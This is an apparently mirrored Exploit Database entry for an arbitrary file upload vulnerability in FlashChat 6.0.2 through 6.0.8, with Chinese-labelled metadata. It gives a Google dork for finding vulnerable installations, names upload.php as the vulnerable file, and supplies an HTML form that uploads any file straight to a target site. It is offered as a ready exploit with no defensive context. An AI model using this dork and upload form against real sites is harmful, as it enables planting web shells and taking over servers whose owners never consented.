FlashChat 6.0.2 < 6.0.8 - Arbitrary File Upload

• Exploit Database
• 17 阅读

• 作者： x-hayben21
  日期： 2013-10-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/28709/

• #######################################################	
  # Exploit Title: FlashChat File Upload Vulnerability
  # Google Dork: intitle:FlashChat v6.0.8
  # Date: 02.10.2013
  # Exploit Author: x-hayben21
  # Vendor Homepage: www.punish3r.com
  # Software Link: http://www.tufat.com/script2.htm
  # Version: v6.0.8, v6.0.2, v6.0.4, v6.0.5, v6.0.6, v6.0.7,
  # Tested on: Windows, PHP 5.2
  #
  # Special Thanks : MaXtoR - PoLoNia
  #######################################################	
  
  #Vulnerable File : upload.php
  
  #Exploit
  <form action="http://sites/script/upload.php" method="post" enctype="multipart/form-data">
  <label for="file">Filename:</label>
  <input type="file" name="file" id="file"><br>
  <input type="submit" name="submit" value="Submit">
  </form>